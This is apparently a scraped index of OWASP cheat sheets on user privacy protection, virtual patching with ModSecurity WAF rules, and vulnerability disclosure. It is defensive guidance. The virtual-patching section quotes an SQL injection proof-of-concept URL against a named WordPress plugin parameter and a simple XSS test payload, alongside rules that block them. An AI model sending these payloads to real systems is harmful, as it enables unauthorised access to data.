Any online platform that handles user identities, private information or communications must be secured with the use of strong cryptography. User communications must be encrypted in transit and in storage. User secrets such as passwords must also be protected using strong hashing algorithms with increasing work factors, in order to greatly mitigate the risk of exposed credentials and to provide proper integrity control.

To protect data in transit, developers must use and adhere to TLS/SSL best practices such as verified certificates, adequately protected private keys, usage of strong ciphers only, informative and clear warnings to users, as well as sufficient key lengths. Private data must be encrypted in storage using keys with sufficient lengths and under strict access conditions, both technical and procedural. User credentials must be hashed regardless of whether or not they are encrypted in storage.
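
As a minimal sketch of credential hashing with an adaptive work factor (assuming the Spring Security Crypto module is on the classpath; the work factor and the plaintextPassword/candidatePassword variables are illustrative):

import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;

// Minimal sketch: hash passwords with bcrypt (an adaptive, work-factor based
// algorithm) rather than a fast general-purpose hash.
BCryptPasswordEncoder encoder = new BCryptPasswordEncoder(12);

String storedHash = encoder.encode(plaintextPassword);              // at registration
boolean matches = encoder.matches(candidatePassword, storedHash);   // at login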

For detailed guides about strong cryptography and best practices, read the following OWASP references:

  1. Cryptographic Storage Cheat Sheet.
  2. Authentication Cheat Sheet.
  3. Transport Layer Protection Cheat Sheet.
  4. Guide to Cryptography.
  5. Testing for TLS/SSL.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#support-http-strict-transport-security","title":"Support HTTP Strict Transport Security","text":"

HTTP Strict Transport Security (HSTS) is an HTTP header set by the server indicating to the user agent that only secure (HTTPS) connections are accepted, prompting the user agent to change all insecure HTTP links to HTTPS, and forcing the compliant user agent to fail-safe by refusing any TLS/SSL connection that is not trusted by the user.

HSTS is widely supported by popular user agents, such as Mozilla Firefox and Google Chrome. It is particularly valuable for users who are at heightened risk of surveillance and man-in-the-middle attacks.

If it is impractical to force HSTS on all users, web developers should at least give users the choice to enable it if they wish to make use of it.

For more details regarding HSTS, please visit:

  1. HTTP Strict Transport Security in Wikipedia.
  2. IETF for HSTS RFC.
  3. OWASP Appsec Tutorial Series - Episode 4: Strict Transport Security.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#digital-certificate-pinning","title":"Digital Certificate Pinning","text":"

Certificate Pinning is the practice of hardcoding or storing a predefined set of information (usually hashes) for digital certificates/public keys in the user agent (be it web browser, mobile app or browser plugin) such that only the predefined certificates/public keys are used for secure communication, and all others will fail, even if the user trusted (implicitly or explicitly) the other certificates/public keys.
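
For a mobile or thick-client context, a minimal sketch using OkHttp's certificate pinner (the host name and pin values below are placeholders, not real pins) might look like this:

import okhttp3.CertificatePinner;
import okhttp3.OkHttpClient;

// Minimal sketch: pin the expected public key hashes for a host so that a
// certificate chain built on any other key is rejected, even if it chains to
// a CA that the device otherwise trusts. Always pin a backup key as well.
CertificatePinner pinner = new CertificatePinner.Builder()
        .add(\"example.org\", \"sha256/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\")  // current key (placeholder)
        .add(\"example.org\", \"sha256/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=\")  // backup key (placeholder)
        .build();

OkHttpClient client = new OkHttpClient.Builder()
        .certificatePinner(pinner)
        .build();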

Some advantages for pinning are:

For details regarding certificate pinning, please refer to the following:

  1. OWASP Certificate Pinning Cheat Sheet.
  2. Public Key Pinning Extension for HTTP RFC.
  3. Securing the SSL channel against man-in-the-middle attacks: Future technologies - HTTP Strict Transport Security and Pinning of Certs, by Tobias Gondrom.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#panic-modes","title":"Panic Modes","text":"

A panic mode is a mode that threatened users can invoke when they come under direct pressure to disclose their account credentials.

Giving users the ability to create a panic mode can help them survive these threats, especially in tumultuous regions around the world. Unfortunately many users around the world are subject to types of threats that most web developers do not know of or take into account.

Examples of panic modes are modes where distressed users can delete their data upon threat, log into fake inboxes/accounts/systems, or invoke triggers to backup/upload/hide sensitive data.

The appropriate panic mode to implement differs depending on the application type. Disk encryption software such as VeraCrypt might implement a panic mode that starts up a fake system partition if the user enters their distress password.

Email providers might implement a panic mode that hides predefined sensitive emails or contacts, allowing reading innocent email messages only, usually as defined by the user, while preventing the panic mode from overtaking the actual account.

An important note about panic modes is that they must not be easily discoverable, if at all. An adversary inside a victim's panic mode must not have any way, or as few possibilities as possible, of finding out the truth. This means that once inside a panic mode, most non-sensitive normal operations must be allowed to continue (such as sending or receiving email), and that further panic modes must be possible to create from inside the original panic mode (If the adversary tried to create a panic mode on a victim's panic mode and failed, the adversary would know they were already inside a panic mode, and might attempt to hurt the victim).

Another solution would be to prevent panic modes from being created from within the user account, making them harder for adversaries to spoof. For example, a panic mode could be created only out of band, and adversaries must have no way of knowing that a panic mode already exists for that particular account.

The implementation of a panic mode must always aim to confuse adversaries and prevent them from reaching the actual accounts/sensitive data of the victim, as well as prevent the discovery of any existing panic modes for a particular account.

For more details regarding VeraCrypt's hidden operating system mode, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#remote-session-invalidation","title":"Remote Session Invalidation","text":"

In case user equipment is lost, stolen or confiscated, or under suspicion of cookie theft, it can be very beneficial for users to be able to view their current online sessions and disconnect/invalidate any suspicious lingering sessions, especially ones that belong to stolen or confiscated devices. Remote session invalidation can also help if a user suspects that their session details were stolen in a man-in-the-middle attack.
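
A minimal sketch of such a feature (assuming a Java servlet container and a single-node deployment; a clustered setup would need a shared session store instead of an in-memory map) could look like this:

import java.util.Collections;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import javax.servlet.http.HttpSession;

// Minimal sketch: track each user's active sessions so they can be listed and
// remotely invalidated, e.g. after a device is lost, stolen or confiscated.
public final class SessionRegistry {

    private static final Map<String, Set<HttpSession>> SESSIONS_BY_USER = new ConcurrentHashMap<>();

    // Call after a successful login.
    public static void register(String username, HttpSession session) {
        SESSIONS_BY_USER.computeIfAbsent(username, u -> ConcurrentHashMap.newKeySet()).add(session);
    }

    // Shown to the user so they can review where they are currently logged in.
    public static Set<HttpSession> sessionsFor(String username) {
        return SESSIONS_BY_USER.getOrDefault(username, Collections.emptySet());
    }

    // Invalidate every session except the one the user is currently using.
    public static void invalidateOthers(String username, String currentSessionId) {
        for (HttpSession s : sessionsFor(username)) {
            if (!s.getId().equals(currentSessionId)) {
                try {
                    s.invalidate();
                } catch (IllegalStateException alreadyInvalid) {
                    // the session expired in the meantime - nothing to do
                }
            }
        }
    }
}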

For details regarding session management, please refer to:

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#allow-connections-from-anonymity-networks","title":"Allow Connections from Anonymity Networks","text":"

Anonymity networks, such as the Tor Project, give users in tumultuous regions around the world a golden chance to escape surveillance, access information or break censorship barriers. More often than not, activists in troubled regions use such networks to report injustice or send uncensored information to the rest of the world, especially mediums such as social networks, media streaming websites and email providers.

Web developers and network administrators must pursue every avenue to enable users to access services from behind such networks, and any policy made against such anonymity networks needs to be carefully re-evaluated with respect to its impact on people around the world.

If possible, application developers should try to integrate or enable easy coupling of their applications with these anonymity networks, such as supporting SOCKS proxies or integration libraries (e.g. OnionKit for Android).
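
As an illustrative sketch of SOCKS support on the client side (assuming a local Tor daemon listening on its default SOCKS port 9050; the URL is a placeholder and exception handling is omitted for brevity):

import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

// Minimal sketch: route an outbound request through a local SOCKS proxy (such
// as the one exposed by a Tor daemon) instead of connecting directly.
Proxy socksProxy = new Proxy(Proxy.Type.SOCKS, new InetSocketAddress(\"127.0.0.1\", 9050));
URLConnection connection = new URL(\"https://example.org/\").openConnection(socksProxy);
connection.connect();

Note that DNS resolution behaviour should also be reviewed when proxying, to avoid leaking hostnames outside the anonymity network.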

For more information about anonymity networks, and the user protections they provide, please refer to:

  1. The Tor Project.
  2. I2P Network.
  3. OnionKit: Boost Network Security and Encryption in your Android Apps.
"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#prevent-ip-address-leakage","title":"Prevent IP Address Leakage","text":"

Preventing leakage of user IP addresses is of great significance when user protection is in scope. Any application that hosts external third-party content, such as avatars, signatures or photo attachments, must take into account the benefits of allowing users to block third-party content from being loaded in the application page.

If it is possible to embed third-party, external-domain images in a user's feed or timeline, for example, an adversary might use this to discover a victim's real IP address by hosting the image on a domain they control and watching for HTTP requests for that image.

Many web applications need user content to operate, and this is completely acceptable as a business process; however, web developers are advised to consider giving users the option of blocking external content as a precaution. This applies mainly to social networks and forums, but can also apply to web-based email, where images can be embedded in HTML-formatted emails.
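
One hedged sketch of such a precaution (the /image-proxy endpoint and the first-party host name are illustrative and would need to be implemented separately; assumes a recent JDK) is to rewrite third-party image URLs so they are fetched through a first-party proxy, keeping the viewer's IP address away from the external host:

import java.net.URI;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Minimal sketch: route third-party images through a first-party proxy endpoint
// so the external host never sees the viewer's IP address. Input is assumed to
// be a syntactically valid URL.
public final class ExternalImageRewriter {

    private static final String FIRST_PARTY_HOST = \"www.example.org\";

    public static String rewrite(String imageUrl) {
        String host = URI.create(imageUrl).getHost();
        if (host == null || host.equalsIgnoreCase(FIRST_PARTY_HOST)) {
            return imageUrl;  // already first-party, nothing to hide
        }
        return \"/image-proxy?src=\" + URLEncoder.encode(imageUrl, StandardCharsets.UTF_8);
    }
}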

A similar issue exists in HTML-formatted emails that contain third-party images; however, most email clients and providers block the loading of third-party content by default, giving users better privacy and anonymity protection.

"},{"location":"cheatsheets/User_Privacy_Protection_Cheat_Sheet.html#honesty-transparency","title":"Honesty & Transparency","text":"

If the web application cannot provide enough legal or political protections to the user, or if the web application cannot prevent misuse or disclosure of sensitive information such as logs, the truth must be told to the users in a clear understandable form, so that users can make an educated choice about whether or not they should use that particular service.

If it doesn't violate the law, inform users if their information is being requested for removal or investigation by external entities.

Honesty goes a long way towards cultivating a culture of trust between a web application and its users, and it allows many users around the world to weigh their options carefully, preventing harm to users in various contrasting regions around the world.

More insight regarding secure logging can be found at:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html","title":"Virtual Patching Cheat Sheet","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal of this cheat sheet is to present a concise virtual patching framework that organizations can follow to maximize the timely implementation of mitigation protections.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#definition-virtual-patching","title":"Definition: Virtual Patching","text":"

A security policy enforcement layer which prevents and reports the exploitation attempt of a known vulnerability.

The virtual patch works when the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of virtual patching is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#why-not-just-fix-the-code","title":"Why Not Just Fix the Code","text":"

From a purely technical perspective, the number one remediation strategy would be for an organization to correct the identified vulnerability within the source code of the web application. This concept is universally agreed upon by both web application security experts and system owners. Unfortunately, in real-world business situations, there are many scenarios where updating the source code of a web application is not easy, such as:

The important point is this - Code level fixes and Virtual Patching are NOT mutually exclusive. They are processes that are executed by different teams (OWASP Builders/Devs vs. OWASP Defenders/OpSec) and can be run in tandem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#value-of-virtual-patching","title":"Value of Virtual Patching","text":"

The two main goals of Virtual Patching are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patching-tools","title":"Virtual Patching Tools","text":"

Notice that the definition above did not list any specific tool, as there are a number of different options that may be used for virtual patching efforts, such as:

For example purposes, we will show virtual patching examples using the open source ModSecurity WAF tool.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#a-virtual-patching-methodology","title":"A Virtual Patching Methodology","text":"

Virtual Patching, like most other security processes, is not something that should be approached haphazardly. Instead, a consistent, repeatable process should be followed that will provide the best chances of success. The following virtual patching workflow mimics the industry accepted practice for conducting IT Incident Response and consists of the following phases:

  1. Preparation.
  2. Identification.
  3. Analysis.
  4. Virtual Patch Creation.
  5. Implementation/Testing.
  6. Recovery/Follow Up.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-public-vulnerability","title":"Example Public Vulnerability","text":"

Let's take the following SQL Injection vulnerability as our example for the remainder of this article:

WordPress Shopping Cart Plugin for WordPress\n/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\nreqID Parameter prone to SQL Injection.\n

Description:

WordPress Shopping Cart Plugin for WordPress contains a flaw that may allow an attacker to carry out an SQL injection attack.

The issue is due to the /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php script not properly sanitizing user-supplied input to the reqID parameter.

This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#preparation-phase","title":"Preparation Phase","text":"

The importance of properly utilizing the preparation phase with regards to virtual patching cannot be overstated. You need to do a number of things to setup the virtual patching processes and framework prior to actually having to deal with an identified vulnerability, or worse yet, react to a live web application intrusion. The point is that during a live compromise is not the ideal time to be proposing installation of a web application firewall and the concept of a virtual patch. Tension is high during real incidents and time is of the essence, so lay the foundation of virtual patching when the waters are calm and get everything in place and ready to go when an incident does occur.

Here are a few critical items that should be addressed during the preparation phase:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#identification-phase","title":"Identification Phase","text":"

The Identification Phase occurs when an organization becomes aware of a vulnerability within their web application. There are generally two different methods of identifying vulnerabilities: Proactive and Reactive.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#proactive-identification","title":"Proactive Identification","text":"

This occurs when an organization takes it upon itself to assess its web security posture and conducts the following tasks:

Because custom-coded web applications are unique, these proactive identification tasks are extremely important, as you are not able to rely upon third-party vulnerability notifications.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#reactive-identification","title":"Reactive Identification","text":"

There are three main reactive methods for identifying vulnerabilities:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#analysis-phase","title":"Analysis Phase","text":"

Here are the recommended steps to start the analysis phase:

  1. Determine Virtual Patching Applicability - Virtual patching is ideally suited for injection-type flaws but may not provide an adequate level of attack surface reduction for other attack types or categories. Thorough analysis of the underlying flaw should be conducted to determine if the virtual patching tool has adequate detection logic capabilities.
  2. Utilize Bug Tracking/Ticketing System - Enter the vulnerability information into a bug tracking system for tracking purposes and metrics. It is recommended to use a ticketing system you already have, such as Jira, or you may use a specialized tool such as ThreadFix.
  3. Verify the name of the vulnerability - This means that you need to have the proper public vulnerability identifier (such as CVE name/number) specified by the vulnerability announcement, vulnerability scan, etc. If the vulnerability is identified proactively rather than through public announcements, then you should assign your own unique identifier to each vulnerability.
  4. Designate the impact level - It is always important to understand the level of criticality involved with a web vulnerability. Information leakages may not be treated in the same manner as an SQL Injection issue.
  5. Specify which versions of software are impacted - You need to identify what versions of software are listed so that you can determine if the version(s) you have installed are affected.
  6. List what configuration is required to trigger the problem - Some vulnerabilities may only manifest themselves under certain configuration settings.
  7. List Proof of Concept (PoC) exploit code or payloads used during attacks/testing - Many vulnerability announcements have accompanying exploit code that shows how to demonstrate the vulnerability. If this data is available, make sure to download it for analysis. This will be useful later on when both developing and testing the virtual patch.
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#virtual-patch-creation-phase","title":"Virtual Patch Creation Phase","text":"

The process of creating an accurate virtual patch is bound by two main tenets:

  1. No false positives - Do not ever block legitimate traffic under any circumstances.
  2. No false negatives - Do not ever miss attacks, even when the attacker intentionally tries to evade detection.

Care should be taken to attempt to minimize violations of either of these two rules. It may not be possible to adhere 100% to each of these goals, but remember that virtual patching is about Risk Reduction. It should be understood by business owners that while you are gaining the advantage of shortening the Time-to-Fix metric, you may not be implementing a complete fix for the flaw.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#manual-virtual-patch-creation","title":"Manual Virtual Patch Creation","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#positive-security-allow-list-virtual-patches-recommended-solution","title":"Positive Security (Allow List) Virtual Patches (Recommended Solution)","text":"

A positive security model (allow list) is a comprehensive security mechanism that provides an independent input validation envelope to an application. The model specifies the characteristics of valid input (character set, length, etc.) and denies anything that does not conform. By defining rules for every parameter in every page in the application, the application is protected by an additional security envelope independent from its code.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-allow-list-modsecurity-virtual-patch","title":"Example Allow List ModSecurity Virtual Patch","text":"

In order to create an allow-list virtual patch, you must be able to verify what the normal, expected input values are. If you have implemented proper audit logging as part of the Preparation Phase, then you should be able to review audit logs to identify the format of expected input types. In this case, the reqID parameter is supposed to only hold integer characters so we can use this virtual patch:

##\n## Verify we only receive 1 parameter called \"reqID\"\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter - Duplicate Parameters Names Seen.',logdata:'%{matched_var}'\"\n  SecRule &ARGS:/reqID/ \"!@eq 1\"\n\n##\n## Verify reqID's payload only contains integers\n##\nSecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:2,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"!@rx ^[0-9]+$\"\n

This virtual patch will inspect the reqID parameter value on the specified page and prevent any characters other than integers as input.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#negative-security-block-list-virtual-patches","title":"Negative Security (Block List) Virtual Patches","text":"

A negative security model (block list) is based on a set of rules that detect specific known attacks rather than allow only valid traffic.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#example-block-list-modsecurity-virtual-patch","title":"Example Block List ModSecurity Virtual Patch","text":"

Here is the example PoC code that was supplied by the public advisory:

http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1\n

Looking at the payload, we can see that the attacker is inserting a single quote character and then adding additional SQL query logic to the end. Based on this data, we could disallow the single quote character like this:

SecRule REQUEST_URI \"@contains /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php\" \"chain,id:1,phase:2,t:none,t:Utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,block,msg:'Input Validation Error for \\'reqID\\' parameter.',logdata:'%{args.reqid}'\"\n  SecRule ARGS:/reqID/ \"@pm '\"\n
"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#which-method-is-better-for-virtual-patching-positive-or-negative-security","title":"Which Method is Better for Virtual Patching \u2013 Positive or Negative Security","text":"

A virtual patch may employ either a positive or negative security model. Which one you decide to use depends on the situation and a few different considerations. For example, negative security rules can usually be implemented more quickly, however the possible evasions are more likely.

Positive security rules, on the other hand, provide better protection; however, they are often created through a manual process and are thus not scalable and difficult to maintain for large/dynamic sites. While manual positive security rules for an entire site may not be feasible, a positive security model can be selectively employed when a vulnerability alert identifies a specific location with a problem.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#beware-of-exploit-specific-virtual-patches","title":"Beware of Exploit-Specific Virtual Patches","text":"

You want to resist the urge to take the easy road and quickly create an exploit-specific virtual patch.

For instance, if an authorized penetration test identified an XSS vulnerability on a page and used the following attack payload in the report:

<script>\nalert('XSS Test')\n</script>\n

It would not be wise to implement a virtual patch that simply blocks that exact payload. While it may provide some immediate protection, its long term value is significantly decreased.

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#automated-virtual-patch-creation","title":"Automated Virtual Patch Creation","text":"

Manual patch creation may become unfeasible as the number of vulnerabilities grows, and automated means may become necessary. If the vulnerabilities were identified using automated tools and an XML report is available, it is possible to leverage automated processes to auto-convert this vulnerability data into virtual patches for protection systems.

Three examples include:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#implementationtesting-phase","title":"Implementation/Testing Phase","text":"

In order to accurately test out the newly created virtual patches, it may be necessary to use an application other than a web browser. Some useful tools are:

"},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#testing-steps","title":"Testing Steps","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#recoveryfollow-up-phase","title":"Recovery/Follow-Up Phase","text":""},{"location":"cheatsheets/Virtual_Patching_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html","title":"Vulnerability Disclosure Cheat Sheet","text":""},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet is intended to provide guidance on the vulnerability disclosure process for both security researchers and organisations. This is an area where collaboration is extremely important, but that can often result in conflict between the two parties.

Researchers should:

Organisations should:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#methods-of-disclosure","title":"Methods of Disclosure","text":"

There are a number of different models that can be followed when disclosing vulnerabilities, which are listed in the sections below.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#private-disclosure","title":"Private Disclosure","text":"

In the private disclosure model, the vulnerability is reported privately to the organisation. The organisation may choose to publish the details of the vulnerabilities, but this is done at the discretion of the organisation, not the researcher, meaning that many vulnerabilities may never be made public. The majority of bug bounty programs require that the researcher follows this model.

The main problem with this model is that if the vendor is unresponsive, or decides not to fix the vulnerability, then the details may never be made public. Historically this has led to researchers getting fed up with companies ignoring and trying to hide vulnerabilities, leading them to the full disclosure approach.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#full-disclosure","title":"Full Disclosure","text":"

With the full disclosure approach, the full details of the vulnerability are made public as soon as they are identified. This means that the full details (sometimes including exploit code) are available to attackers, often before a patch is available. The full disclosure approach is primarily used in response to organisations ignoring reported vulnerabilities, in order to put pressure on them to develop and publish a fix.

This makes the full disclosure approach very controversial, and it is seen as irresponsible by many people. Generally it should only be considered as a last resort, when all other methods have failed, or when exploit code is already publicly available.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#responsible-or-coordinated-disclosure","title":"Responsible or Coordinated Disclosure","text":"

Responsible disclosure attempts to find a reasonable middle ground between these two approaches. With responsible disclosure, the initial report is made privately, but with the full details being published once a patch has been made available (sometimes with a delay to allow more time for the patches to be installed).

In many cases, the researcher also provides a deadline for the organisation to respond to the report, or to provide a patch. If this deadline is not met, then the researcher may adopt the full disclosure approach, and publish the full details.

Google's Project Zero adopts a similar approach, where the full details of the vulnerability are published after 90 days regardless of whether or not the organisation has published a patch.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#reporting-vulnerabilities","title":"Reporting Vulnerabilities","text":"

This section is intended to provide guidance for security researchers on how to report vulnerabilities to organisations.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#warnings-and-legality","title":"Warnings and Legality","text":"

Before carrying out any security research or reporting vulnerabilities, ensure that you know and understand the laws in your jurisdiction. This cheat sheet does not constitute legal advice, and should not be taken as such.

The following points highlight a number of areas that should be considered:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#finding-contact-details","title":"Finding Contact Details","text":"

The first step in reporting a vulnerability is finding the appropriate person to report it to. Although some organisations have clearly published disclosure policies, many do not, so it can be difficult to find the correct place to report the issue.

Where there is no clear disclosure policy, the following areas may provide contact details:

When reaching out to people who are not dedicated security contacts, request the details for a relevant member of staff, rather than disclosing the vulnerability details to whoever accepts the initial contact (especially over social media).

If it is not possible to contact the organisation directly, a national or sector-based CERT may be able to assist.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#initial-report","title":"Initial Report","text":"

Once a security contact has been identified, an initial report should be made of the details of the vulnerability. Ideally this should be done over an encrypted channel (such as the use of PGP keys), although many organisations do not support this.

The initial report should include:

In many cases, especially in smaller organisations, the security reports may be handled by developers or IT staff who do not have a security background. This means that they may not be familiar with many security concepts or terminology, so reports should be written in clear and simple terms.

It may also be beneficial to provide a recommendation on how the issue could be mitigated or resolved. However, unless the details of the system or application are known, or you are very confident in the recommendation, it may be better to point the developers to some more general guidance (such as an OWASP cheat sheet).

If you are planning to publish the details of the vulnerability after a period of time (as per some responsible disclosure policies), then this should be clearly communicated in the initial email - but try to do so in a tone that doesn't sound threatening to the recipient.

If the organisation does not have an established bug bounty program, then avoid asking about payments or rewards in the initial contact - leave it until the issue has been acknowledged (or ideally fixed). In particular, do not demand payment before revealing the details of the vulnerability. At best this will look like an attempt to scam the company, at worst it may constitute blackmail.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#ongoing-communication","title":"Ongoing Communication","text":"

While simpler vulnerabilities might be resolved solely from the initial report, in many cases there will be a number of emails back and forth between the researcher and the organisation. Especially for more complex vulnerabilities, the developers or administrators may ask for additional information or recommendations on how to resolve the issue. They may also ask for assistance in retesting the issue once a fix has been implemented. Although there is no obligation to carry out this retesting, as long as the request is reasonable, providing feedback on the fixes is very beneficial.

It may also be necessary to chase up the organisation if they become unresponsive, or if the established deadline for publicly disclosing the vulnerability is approaching. Ensure that this communication stays professional and positive - if the disclosure process becomes hostile then neither party will benefit.

Be patient if it's taking a while for the issue to be resolved. The developers may be under significant pressure from different people within the organisation, and may not be able to be fully open in their communication. Triaging, developing, reviewing, testing and deploying a fix within an enterprise environment takes significantly more time than most researchers expect, and being constantly hassled for updates just adds another level of pressure on the developers.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-give-up","title":"When to Give Up","text":"

Despite every effort that you make, some organisations are not interested in security, are impossible to contact, or may be actively hostile to researchers disclosing vulnerabilities. In some cases they may even threaten to take legal action against researchers. When this happens it is very disheartening for the researcher - it is important not to take this personally. When this happens, there are a number of options that can be taken.

There are many organisations who have a genuine interest in security, and are very open and co-operative with security researchers. Unless the vulnerability is extremely serious, it is not worth burning yourself out, or risking your career and livelihood over an organisation who doesn't care.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing","title":"Publishing","text":"

Once a vulnerability has been patched (or not), then a decision needs to be made about publishing the details. This should ideally be done through discussion with the vendor, and at a minimum the vendor should be notified that you intend to publish, and provided with a link to the published details. The disclosure would typically include:

Some organisations may request that you do not publish the details at all, or that you delay publication to allow their users more time to install security patches. In the interest of maintaining a positive relationship with the organisation, it is worth trying to find a compromise position on this.

Whether to publish a working proof of concept (or functional exploit code) is a subject of debate. Some people will view this as a \"blackhat\" move, and will argue that by doing so you are directly helping criminals compromise their users. On the other hand, the code can be used by both system administrators and penetration testers to test their systems, and attackers will be able to develop or reverse engineer working exploit code if the vulnerability is sufficiently valuable.

If you are publishing the details in hostile circumstances (such as an unresponsive organisation, or after a stated period of time has elapsed) then you may face threats and even legal action. Whether there is any legal basis for this will depend on your jurisdiction, and whether you signed any form of non-disclosure agreement with the organisation. Make sure you understand your legal position before doing so.

Note that many bug bounty programs forbid researchers from publishing the details without the agreement of the organisation. If you choose to do so, you may forfeit the bounty or be banned from the platform - so read the rules of the program before publishing.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#receiving-vulnerability-reports","title":"Receiving Vulnerability Reports","text":"

This section is intended to provide guidance for organisations on how to accept and receive vulnerability reports.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#bug-bounty-programs","title":"Bug Bounty Programs","text":"

Bug bounty programs incentivise researchers to identify and report vulnerabilities to organisations by offering rewards. These are usually monetary, but can also be physical items (swag). The process is often managed through a third party such as BugCrowd or HackerOne, who provide mediation between researchers and organisations.

When implementing a bug bounty program, the following areas need to be clearly defined:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#when-to-implement-a-bug-bounty-program","title":"When to Implement a Bug Bounty Program","text":"

Bug bounty programs have been adopted by many large organisations such as Microsoft, and are starting to be used outside of the commercial sector, including by the US Department of Defense. However, for smaller organisations they can bring significant challenges, and require a substantial investment of time and resources. These challenges can include:

Despite these potential issues, bug bounty programs are a great way to identify vulnerabilities in applications and systems. However, they should only be used by organisations that already have a mature vulnerability disclosure process, supported by strong internal processes to resolve vulnerabilities.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#publishing-contact-details","title":"Publishing Contact Details","text":"

The most important step in the process is providing a way for security researchers to contact your organisation. The easier it is for them to do so, the more likely it is that you'll receive security reports. The following list includes some of the common mechanisms that are used for this - the more of these that you can implement the better:

It is also important to ensure that frontline staff (such as those who monitor the main contact address, web chat and phone lines) are aware of how to handle reports of security issues, and who to escalate these reports to within the organisation.

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#providing-reporting-guidelines","title":"Providing Reporting Guidelines","text":"

Alongside the contact details, it is also good to provide some guidelines for researchers to follow when reporting vulnerabilities. These could include:

"},{"location":"cheatsheets/Vulnerability_Disclosure_Cheat_Sheet.html#communicating-with-researchers","title":"Communicating With Researchers","text":"

Communication between researchers and organisations is often one of the hardest points of the vulnerability disclosure process, and can easily leave both sides frustrated and unhappy with the process.

The outline below provides an example of the ideal communication process:

Throughout the process, provide regular updates of the current status, and the expected timeline to triage and fix the vulnerability. Even if there is no firm timeline for these, the ongoing communication provides some reassurance that the vulnerability hasn't been forgotten about.

